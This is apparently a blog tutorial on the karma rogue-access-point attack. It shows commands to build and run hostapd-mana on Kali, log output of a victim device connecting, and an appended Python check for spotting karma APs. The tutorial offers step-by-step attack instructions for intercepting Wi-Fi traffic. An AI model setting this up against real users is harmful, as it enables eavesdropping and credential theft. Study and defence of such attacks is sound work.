12 Sep 2016, 19:09

Wireless Tricks

Wireless has been a great benefit to everyone, from the person drinking coffee at their local coffee shop to the salesperson checking their email. Security was an afterthought in the original design of the 802.11 standards, which has led to hackers being able to see and steal other individuals' traffic.

In this post I will partially demonstrate how an average Joe can set up their wireless to:

  • Sniff data (Man-in-the-Middle)
  • Steal your personal Active Directory password (NetNTLMv2)
  • Inject malicious code

The above list could go on indefinitely, as the hacker would have full control over the victim's traffic in both directions.

Let's start with a simple one, namely the Karma attack.

Karma Attack

The concept of a karma attack is pretty simple; let's take a look at the diagram below:

                                    Normal Probe Request


                             Probe Request: My Home Wifi
    Broadcasts probes        Probe Request: Work Wifi               Listens for probes
    +------------------+     Probe Request: Coffeshop Wifi         +-------------------+
    |                  +------------------------------------------->        Home       |
    |  Phone / Laptop  |                                           |  Wireless Router  |
    |                  <-------------------------------------------+                   |
    +------------------+      Probe Response: My Home Wifi         +-------------------+
    Listens for beacons       Beacon:         My Home Wifi          Broadcasts beacons

In the above diagram, a user's phone/laptop at home will continuously probe for the access points the user has previously connected to, namely:

Probe Request: My Home Wifi
Probe Request: Work Wifi
Probe Request: Coffeshop Wifi

The wireless router at home will receive the probe request for My Home Wifi and answer, in effect, "Hello, I'm here!".

This is where the initial handshake, DHCP lease, etc. take place, and the user is connected to their home network.

An attacker could take advantage of this design; consider the following diagram:

                     Probe Request: My Home Wifi
 Broadcasts probes   Probe Request: Work Wifi        Listens for probes                Listens for probes
+------------------+ Probe Request: Coffeshop Wifi +---------------------+           +-------------------+
|                  +------------------------------->                     +----------->    Coffee shop    |
|  Phone / Laptop  |                               |  Hacker's Karma AP  |  Traffic  |  Wireless Router  |
|                  <-------------------------------+                     <-----------+                   |
+------------------+ Probe Response: My Home Wifi  +---------------------+           +-------------------+
 Listens for beacons Beacon:         My Home Wifi    Broadcasts beacons                 Broadcasts beacons

Let's say a user is sitting at a local coffee shop where Mr Hacker has set up a karma access point. As before, the user's device will probe for the access points stored on it.

The attacker's access point will respond to any of those requests, making the user's device connect in the belief that it has found the legitimate access point. In the above case, the user (at the local coffee shop) is now connected to "My Home Wifi".

The attacker can now forward all of the user's traffic via the coffee shop network while having full access to it.

Karma Setup

The Gear

  • TP-LINK TL-WN722N
  • Alfa ARS-N19 omni-directional 9 dBi antenna
  • Kali VM

Let's set up our own karma access point. I will make use of the SensePost MANA toolkit for this (thanks to SensePost for the repo):

git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana/hostapd && make

The above commands clone the hostapd-mana git repository and compile the hostapd executable for you.

Once this is done, it is time to set up the wireless adapter on the Kali Virtual Machine.

Insert your wireless adapter and type the following in your terminal:

iwconfig

This should print out your currently active wireless interfaces, below is an example of what it could look like:

[root@kali]$ iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

wlan0 is my TP-Link adapter, which I will be using for this attack; yours might be wlan1 etc., so just remember the interface name.

Next, we need to put the wlan0 interface into monitor mode with the following commands:

airmon-ng check kill
airmon-ng start wlan0

This will create a new interface that is in monitor mode; to verify, we can run iwconfig again.

[root@kali]$ iwconfig
wlan0mon  IEEE 802.11bgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

As you can see, my wireless interface name has changed to wlan0mon; don't be alarmed if yours is something like mon0.

Copy the name of the wireless interface, open the config file called hostapd.conf with your preferred text editor, and make the following changes:

  • Change the line interface=wlan0 to interface=wlan0mon, substituting the interface name you copied.
  • Change ssid=test (Line: 111) to something more desirable; I will make mine ssid=Free Wifi

Running hostapd

Type the following to start the karma attack:

./hostapd hostapd.conf

Sample output could be as follows:

[root@kali]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED

As you can see, we now have an access point broadcasting the SSID Free Wifi, but whenever a probe request from a victim is received, hostapd will respond to it so that the victim's device connects to our access point.

The below output shows a successful connection to our karma access point:

[root@winter hostapd (master ✗)]$ ./hostapd hostapd.conf
Configuration file: hostapd.conf
Using interface wlan0mon with hwaddr c4:e9:84:18:1d:c7 and ssid "Free Wifi"
wlan0mon: interface state UNINITIALIZED->ENABLED
wlan0mon: AP-ENABLED
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
MANA - Directed probe request for foreign SSID 'My Home Wifi' from 6c:72:e7:98:9e:22
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: authenticated
wlan0mon: STA 6c:72:e7:98:9e:22 IEEE 802.11: associated (aid 1)
wlan0mon: AP-STA-CONNECTED 6c:72:e7:98:9e:22
MANA - Successful association of 6c:72:e7:98:9e:22 to ESSID 'My Home Wifi'
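The output above also shows what a defender can look for: the access point beacons "Free Wifi" but answers probe requests for 'My Home Wifi', an SSID it never beacons. The check below is an added example (not code from this post or from hostapd-mana) that flags a BSSID whose probe responses carry SSIDs it does not beacon; the frame list is constructed sample data, and the second BSSID is made up.

```python
"""Spot a karma-style AP from passively observed 802.11 management frames.

A legitimate AP only answers probe requests for the SSID(s) it beacons; a
karma AP answers for whatever SSID the client asks about. The frames below
are constructed sample data modelled on the log output in the post, not a
real capture (a real deployment would parse a monitor-mode pcap instead).
"""
from collections import defaultdict

# (frame_type, bssid, ssid) observations; all constructed for this example.
OBSERVED_FRAMES = [
    ("beacon",         "c4:e9:84:18:1d:c7", "Free Wifi"),       # karma AP from the post
    ("probe_response", "c4:e9:84:18:1d:c7", "My Home Wifi"),    # answers a foreign SSID
    ("probe_response", "c4:e9:84:18:1d:c7", "Work Wifi"),
    ("probe_response", "c4:e9:84:18:1d:c7", "Coffeshop Wifi"),
    ("beacon",         "00:11:22:33:44:55", "Coffeshop Wifi"),  # legitimate AP (made up BSSID)
    ("probe_response", "00:11:22:33:44:55", "Coffeshop Wifi"),
]


def find_karma_candidates(frames, min_foreign=1):
    """Return {bssid: sorted SSIDs it answered probes for but never beaconed}.

    A BSSID is reported when it has at least `min_foreign` such SSIDs. A
    hidden-SSID AP beacons an empty SSID and legitimately answers a directed
    probe with its real name, so a single such answer is not flagged.
    """
    beaconed = defaultdict(set)
    responded = defaultdict(set)
    for ftype, bssid, ssid in frames:
        bssid = bssid.lower()
        if ftype == "beacon":
            beaconed[bssid].add(ssid)
        elif ftype == "probe_response":
            responded[bssid].add(ssid)

    suspicious = {}
    for bssid, ssids in responded.items():
        hidden = beaconed[bssid] <= {""}          # no beacon seen, or empty SSID only
        foreign = sorted(s for s in ssids - beaconed[bssid] if s)
        if hidden and len(foreign) == 1:
            continue                              # normal hidden-network behaviour
        if len(foreign) >= min_foreign:
            suspicious[bssid] = foreign
    return suspicious


if __name__ == "__main__":
    for bssid, ssids in find_karma_candidates(OBSERVED_FRAMES).items():
        print(f"{bssid} answers probes for SSIDs it does not beacon: {ssids}")
```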